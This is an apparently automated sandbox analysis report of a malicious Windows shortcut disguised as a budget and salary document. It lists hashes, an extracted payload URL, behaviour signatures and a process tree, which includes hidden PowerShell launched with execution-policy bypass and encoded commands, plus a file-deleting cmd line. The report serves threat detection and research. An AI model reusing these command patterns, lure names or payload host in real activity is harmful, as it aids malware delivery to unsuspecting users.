Analysis

max time kernel: 152s
max time network: 169s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-01-2024 16:07

Static task: static1

Behavioral task: behavioral1
  Sample: 11012024_0007_2 _ Project budget and candidate salary..lnk
  Resource: win7-20231215-en

Behavioral task: behavioral2
  Sample: 11012024_0007_2 _ Project budget and candidate salary..lnk
  Resource: win10v2004-20231215-en
General

Target: 11012024_0007_2 _ Project budget and candidate salary..lnk
Size: 53KB
MD5: 10369f2b0ad5c9899bbb48e39baeedae
SHA1: 970fc66713a597c9059f31177ed9618472982c24
SHA256: d1e5ce4e97e3ca866aac57eb293c764f56eda897b7685fd689cba9cdf5505fb3
SHA512: ce4efa3bd1cf7752b8420b023d598ba156785b7d19303951dee845d46e6a645d2f1a93b397c3454fae51b120f7fa141c0a42c04aef6b9966e405759d39b9d8be
SSDEEP: 192:8Tb+sFcaygd21iq2HOXt12Py86uAd+7dYkMQ776SVzFSAsQgHuCMswPaod:o9B/RtH0t12JLL+kMKbSAsN4Jyu
Malware Config

Extracted: https://thietbiytebt.online/file/
Extracted: https://thiet
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  22    964   powershell.exe
  57    1664  powershell.exe
  72    1664  powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                Process
  Key value queried  \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation  cmd.exe

Executes dropped EXE (1 IoC)
  pid   Process
  4476  svczHost.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies data under HKEY_USERS (1 IoC)
  description  ioc                                                                                             Process
  Key created  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections  svczHost.exe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid   Process
  964   powershell.exe
  964   powershell.exe
  2356  powershell.exe
  2356  powershell.exe
  1664  powershell.exe
  1664  powershell.exe
  1664  powershell.exe
  4476  svczHost.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description                           pid   Process
  Token: SeDebugPrivilege               964   powershell.exe
  Token: SeDebugPrivilege               2356  powershell.exe
  Token: SeDebugPrivilege               1664  powershell.exe
  Token: SeIncreaseQuotaPrivilege       1664  powershell.exe
  Token: SeSecurityPrivilege            1664  powershell.exe
  Token: SeTakeOwnershipPrivilege       1664  powershell.exe
  Token: SeLoadDriverPrivilege          1664  powershell.exe
  Token: SeSystemProfilePrivilege       1664  powershell.exe
  Token: SeSystemtimePrivilege          1664  powershell.exe
  Token: SeProfSingleProcessPrivilege   1664  powershell.exe
  Token: SeIncBasePriorityPrivilege     1664  powershell.exe
  Token: SeCreatePagefilePrivilege      1664  powershell.exe
  Token: SeBackupPrivilege              1664  powershell.exe
  Token: SeRestorePrivilege             1664  powershell.exe
  Token: SeShutdownPrivilege            1664  powershell.exe
  Token: SeDebugPrivilege               1664  powershell.exe
  Token: SeSystemEnvironmentPrivilege   1664  powershell.exe
  Token: SeRemoteShutdownPrivilege      1664  powershell.exe
  Token: SeUndockPrivilege              1664  powershell.exe
  Token: SeManageVolumePrivilege        1664  powershell.exe
  Token: 33                             1664  powershell.exe
  Token: 34                             1664  powershell.exe
  Token: 35                             1664  powershell.exe
  Token: 36                             1664  powershell.exe
  Token: SeIncreaseQuotaPrivilege       1664  powershell.exe
  Token: SeSecurityPrivilege            1664  powershell.exe
  Token: SeTakeOwnershipPrivilege       1664  powershell.exe
  Token: SeLoadDriverPrivilege          1664  powershell.exe
  Token: SeSystemProfilePrivilege       1664  powershell.exe
  Token: SeSystemtimePrivilege          1664  powershell.exe
  Token: SeProfSingleProcessPrivilege   1664  powershell.exe
  Token: SeIncBasePriorityPrivilege     1664  powershell.exe
  Token: SeCreatePagefilePrivilege      1664  powershell.exe
  Token: SeBackupPrivilege              1664  powershell.exe
  Token: SeRestorePrivilege             1664  powershell.exe
  Token: SeShutdownPrivilege            1664  powershell.exe
  Token: SeDebugPrivilege               1664  powershell.exe
  Token: SeSystemEnvironmentPrivilege   1664  powershell.exe
  Token: SeRemoteShutdownPrivilege      1664  powershell.exe
  Token: SeUndockPrivilege              1664  powershell.exe
  Token: SeManageVolumePrivilege        1664  powershell.exe
  Token: 33                             1664  powershell.exe
  Token: 34                             1664  powershell.exe
  Token: 35                             1664  powershell.exe
  Token: 36                             1664  powershell.exe
  Token: SeIncreaseQuotaPrivilege       1664  powershell.exe
  Token: SeSecurityPrivilege            1664  powershell.exe
  Token: SeTakeOwnershipPrivilege       1664  powershell.exe
  Token: SeLoadDriverPrivilege          1664  powershell.exe
  Token: SeSystemProfilePrivilege       1664  powershell.exe
  Token: SeSystemtimePrivilege          1664  powershell.exe
  Token: SeProfSingleProcessPrivilege   1664  powershell.exe
  Token: SeIncBasePriorityPrivilege     1664  powershell.exe
  Token: SeCreatePagefilePrivilege      1664  powershell.exe
  Token: SeBackupPrivilege              1664  powershell.exe
  Token: SeRestorePrivilege             1664  powershell.exe
  Token: SeShutdownPrivilege            1664  powershell.exe
  Token: SeDebugPrivilege               1664  powershell.exe
  Token: SeSystemEnvironmentPrivilege   1664  powershell.exe
  Token: SeRemoteShutdownPrivilege      1664  powershell.exe
  Token: SeUndockPrivilege              1664  powershell.exe
  Token: SeManageVolumePrivilege        1664  powershell.exe
  Token: 33                             1664  powershell.exe
  Token: 34                             1664  powershell.exe

Suspicious use of WriteProcessMemory (12 IoCs)
  description                        pid   Process         procid_target
  PID 1664 wrote to memory of 1556   1664  cmd.exe         90
  PID 1664 wrote to memory of 1556   1664  cmd.exe         90
  PID 1556 wrote to memory of 964    1556  cmd.exe         92
  PID 1556 wrote to memory of 964    1556  cmd.exe         92
  PID 964 wrote to memory of 2356    964   powershell.exe  100
  PID 964 wrote to memory of 2356    964   powershell.exe  100
  PID 964 wrote to memory of 4364    964   powershell.exe  102
  PID 964 wrote to memory of 4364    964   powershell.exe  102
  PID 4364 wrote to memory of 1664   4364  cmd.exe         104
  PID 4364 wrote to memory of 1664   4364  cmd.exe         104
  PID 4476 wrote to memory of 4304   4476  svczHost.exe    116
  PID 4476 wrote to memory of 4304   4476  svczHost.exe    116
Processes

C:\Windows\system32\cmd.exe (tree depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\11012024_0007_2 _ Project budget and candidate salary..lnk"
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  PID: 1664

  C:\WINDOWS\system32\cmd.exe (tree depth 2)
    Command line: "C:\WINDOWS\system32\cmd.exe" /c [long obfuscated batch command line omitted]
    Signatures: Suspicious use of WriteProcessMemory
    PID: 1556

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 3)
      Command line: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand [encoded command omitted]
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      PID: 964

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 4)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        PID: 2356

      C:\Windows\system32\cmd.exe (tree depth 4)
        Command line: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand [encoded command omitted]
        Signatures: Suspicious use of WriteProcessMemory
        PID: 4364

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 5)
          Command line: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand [encoded command omitted]
          Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          PID: 1664

C:\Windows\Temp\svczHost.exe (tree depth 1)
  Command line: C:\Windows\Temp\svczHost.exe quyet
  Signatures: Executes dropped EXE; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  PID: 4476

  C:\Windows\system32\cmd.exe (tree depth 2)
    Command line: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
    PID: 4304

Network
MITRE ATT&CK Enterprise v15
Downloads